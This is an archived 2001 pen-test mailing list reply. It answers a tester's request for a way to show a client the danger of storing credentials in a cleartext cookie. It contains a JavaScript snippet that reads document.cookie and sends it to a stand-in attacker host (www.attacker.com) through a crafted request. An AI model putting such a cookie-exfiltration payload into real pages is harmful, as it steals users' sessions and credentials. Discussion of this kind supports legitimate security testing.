Re: Wanted: Script to email cookies

From: Jeremiah Grossman (jeremiahat_private)
Date: Sat Dec 01 2001 - 01:32:09 PST

Next message: rudi carell: "Re: Wanted: Script to email cookies"

Previous message: Dan Richardson: "SQL Code"
Next in thread: rudi carell: "Re: Wanted: Script to email cookies"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Well. of course there is the ever famous sniffer....
that will see a cookie quite easily.... to move cookies
off domains without the aid of a sniffer.... JavaScript has
been known the be the most widely used method.

something like

<SCRIPT>
var cookie_data = document.cookie;
window.open('http://www.attacker.com/email_the_cookie.pl?cookie_value=cookie
_data');
</SCRIPT>


Modify to suit your needs...

The point is that your using JavaScript to generate an off domain request
method
passing out the cookie data to a cgi.


good. good.


Jeremiah Grossman



----- Original Message -----
From: "Joe Brown" <joe_brown@senet-int.com>
To: <pen-testat_private>
Sent: Friday, November 30, 2001 6:06 PM
Subject: Wanted: Script to email cookies


>

>
>
>
> I'm working on a pen test for a web application.  After
> the first time you successfully authenticate, the app
> stores a cookie with username and password in clear
> text.  I've recently read the archive regarding
> vulnerable IE browsers revealing cookies.  I'd like to
> go a step farther.  Does anyone have a script that will
> email the cookie?  I'd like to craft an email with a link
> and when a user clicks, it emails the cookie.  I want
> to show the client how dangerous it is to store a clear
> text cookie.  Also, any other method of cookie stealing
> would be really appreciated.  Thanks.
>
> Joe
>
> --------------------------------------------------------------------------
--
> This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please
see:
> https://alerts.securityfocus.com/
>


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: rudi carell: "Re: Wanted: Script to email cookies"
Previous message: Dan Richardson: "SQL Code"
Next in thread: rudi carell: "Re: Wanted: Script to email cookies"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Nov 30 2001 - 14:20:41 PST